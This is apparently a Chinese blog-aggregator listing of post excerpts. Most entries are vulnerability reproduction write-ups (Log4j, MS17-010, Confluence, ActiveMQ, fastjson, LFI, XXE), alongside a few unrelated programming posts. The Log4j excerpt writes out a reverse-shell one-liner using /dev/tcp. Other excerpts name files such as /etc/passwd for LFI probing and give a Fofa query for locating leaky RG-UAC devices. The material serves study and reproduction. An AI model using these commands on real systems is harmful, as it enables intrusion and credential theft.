漏洞 手工inject select
SQL 中 select 和 group by 中数据的相互约束关系
## 前提 本文的前提是 mysql 的sql_mode中含有 `ONLY_FULL_GROUP_BY` 。如果不含有 `ONLY_FULL_GROUP_BY`,那么就没有本文后续说的限制。 可以使用下面这条sql查看。 ```sql SHOW VARIABLES LIKE 'sql_mode'; ......
【漏洞复现】【CNVD-2021-14536】锐捷RG-UAC信息泄露
仅供学习和预防,切记切记不要随意登陆和修改任何东西!!!以免带来不必要的麻烦。 简介:捷RG-UAC上网行为管理信息泄漏漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码。 1.使用Fofa搜索互联网资产 语法:title="RG-UAC登录页面" && body="admin" 2.打开链接, ......
MS17-010漏洞复现
ms17-010永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。 本次通过VMware虚拟机搭建本地环境进行该漏洞的复现。 攻击机:kali 靶机:windows7 1.首先在 ......
Nginx 解析漏洞复现
### Nginx 解析漏洞复现 Nginx解析漏洞复现 版本信息: * Nginx 1.x最新版 * PHP 7.x最新版 由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 ``` docker-compose up -d docker-compose config ......
Apache HTTPD换行解析漏洞(CVE-2017-15715)
### Apache HTTPD 换行解析漏洞(CVE-2017-15715)【项目中遇到】 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页,其**2.4.0~2.4.29**版本中存在一个解析漏洞,在解析PHP时,**1.php\x0A将按照PHP后缀进行解 ......
漏洞练习记录
前言:在此记录一些常见漏洞 # 暴力破解 ## 1 基于表单的暴力破解 指对没有设置验证码,一定时间内提交次数的登录框进行暴力破解 直接用burp suite在用户名和密码添加payload然后跑字典就行,最后观察结果长度判断是否跑出结果 ## 2 验证码绕过(验证码在前端) 我们通过尝试登陆,多次 ......
使用Activate和Select方法选中单元格的异同
尽管使用Activate方法和Select方法都能选中指定的单元格区域,但这两种方法并不完全相同。例如,选中A1:F5单元格区域后,再分别用两种方法选中B5单元格,我们可得: 选中单元格区域后,再使用Activate方法激活该区域里的一个单元格,该区域依然呈选中状态,只改变活动单元格为激活的单元格。 ......
Unity 编辑器选择器工具类Selection 常用函数和用法
# Unity 编辑器选择器工具类Selection 常用函数和用法 [![https://github.com/AlianBlank/download.unity.com](https://img2023.cnblogs.com/other/406187/202308/406187-2023080 ......
linux select函数详解
转载:linux select函数详解 - AlanTu - 博客园 (cnblogs.com) 在Linux中,我们可以使用select函数实现I/O端口的复用,传递给 select函数的参数会告诉内核: •我们所关心的文件描述符 •对每个描述符,我们所关心的状态。(我们是要想从一个文件描述符中读 ......
漏洞发现-web应用之漏洞探针利用修复
原理分析 1.已知 CMS 如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用白盒代码审计自行挖掘。(1.在漏洞平台如seebug、cnvd搜索关键 ......
漏洞发现-操作系统之漏洞探针利用修复
一.探针 1.goby忍者系统测试 2.nmap扫描 如果加上参数,就会调用script目录下的nse插件进行扫描 Nmap --script=vuln 默认nse插件 Nmap vulscan vulners 调用第三方库探针 加入拓展扫描模块 https://cnblogs.com/shwang ......
CTFer成长记录——CTF之Web专题·攻防世界-Web_python_template_injection
一、题目链接 https://adworld.xctf.org.cn/challenges/list 二、解法步骤 python的flask模板注入的题思路比较固定,Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.猜测是否存在注入:直 ......
Mssql手工注入执行命令小记
文章写于2021-04-08,首发于https://www.anquanke.com/post/id/237031#h2-6 前言 本次渗透通过某处SQL注入点进行源码分析,并手工利用xp_cmdshell进行了命令执行。 初现 在某个晴朗夏日午后,闲来无事想测试,这不,马上就掏出xray扫描到了一 ......
CVE-2021-22204 GitLab RCE之exiftool代码执行漏洞深入分析(二)
上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的,接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得,从中收获到自己独特的见解。 ......
Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)
### Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)【项目中遇到过】 **1. 背景简述** java是目前WEB开发中主流的编程语言,而Tomcat是当前流行的Java中间件服务器之一。 Ghostcat(幽灵猫)是由长亭科技安全研究员发现的存在于 Tomcat ......
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
### ActiveMQ任意文件写入漏洞(CVE-2016-3088)【现实项目遇到过】 **1. 环境搭建** ```sh cd vulhub-master/activemq/CVE-2016-3088 docker-compose up -d docker-compose config #查看靶 ......
Nexpose v6.6.209 for Linux & Windows - 漏洞扫描
Nexpose v6.6.209 for Linux & Windows - 漏洞扫描 Rapid7 Vulnerability Management, Release Aug 02, 2023 请访问原文链接:,查看最新版。原创作品,转载请保留出处。 作者主页:[sysin.org](https: ......
CVE-2021-44228 Apache log4j2远程代码执行漏洞
漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti ......
Confluence OGNL表达式注入命令执行漏洞(CVE-2022-26134)
# Confluence OGNL表达式注入命令执行漏洞(CVE-2022-26134) ## 简介 Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需 ......
web渗透测试(14):文件上传漏洞
在本节中,我们将介绍如何使用文件上载功能来获取代码。 在Web应用程序(尤其是使用文件系统来确定应运行哪些代码的应用程序)中,如果您设法上传具有正确文件名的文件(通常取决于扩展名),则可以在服务器上执行代码。在本节中,我们将看到这些类型的攻击的基础知识。 首先,由于我们正在开发一个PHP应用程序,我 ......
C#中的lamda实用的select用法
https://blog.csdn.net/weixin_42780928/article/details/91490348 关于lamda一般的常规用法就不说了,整点比较实用的。 1,集合通过select转匿名对象 List<DemoClass> liset = new List<DemoClas ......
HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)
# HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞) @[TOC](目录标题) ### 漏洞概述 ### http.sys介绍 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务 ......
fastjson 1.2.80 漏洞浅析及利用payload
# 0x01 说明 在fastjson的1.2.80版本中可以通过将依赖加入到java.lang.Exception 期望类的子类中,绕过checkAuto。 # 0x02 简析 ``` { "@type":"java.lang.Exception", "@type":"org.codehaus.g ......
CentOS7/8 升级openssl版本至3.0.8 修补漏洞SWEET32
升级步骤 1.安装perl-CPAN模块yum install perl-IPC-Cmd2.下载openssl源代码wget --no-check-certificate https://www.openssl.org/source/openssl-3.0.8.tar.gz tar -zxvf op ......
shell read彩色提示,select PS3彩色提示
### 彩色库: ```bash ## Color msg ## 来源:https://gitee.com/ApolloAuto/apollo/blob/master/scripts/apollo.bashrc BOLD='\033[1m' RED='\033[0;31m' BLUE='\033[1 ......
Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246)
RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件外网泄露,缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。 此外,攻击者可以通过伪造 Roc... ......
WEB漏洞—XXE&XML之利用检测绕过全解
一.基础概念 1.XML XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞, ......
文件上传漏洞
文件上传漏洞 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者 WebShell 等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 文件上传漏洞本身就是一个危害巨大的漏洞,WebShel ......
A Novel Noise Injection-based Training Scheme for Better Model Robustness
郑重声明:原文参见标题,如有侵权,请联系作者,将会撤销发布! https://arxiv.org/abs/2302.10802 ......
本地文件包含漏洞利用注意事项
## 本地文件包含漏洞利用注意事项 1. 当怀疑某个URL中的参数有LFI漏洞时,可以用/etc/passwd, /var/log/auth.log, /var/log/apache2/access.log,等进行测试,如果已知靶机有其他服务,比如邮件,那么可能还需要测试/var/mail/用户名 ......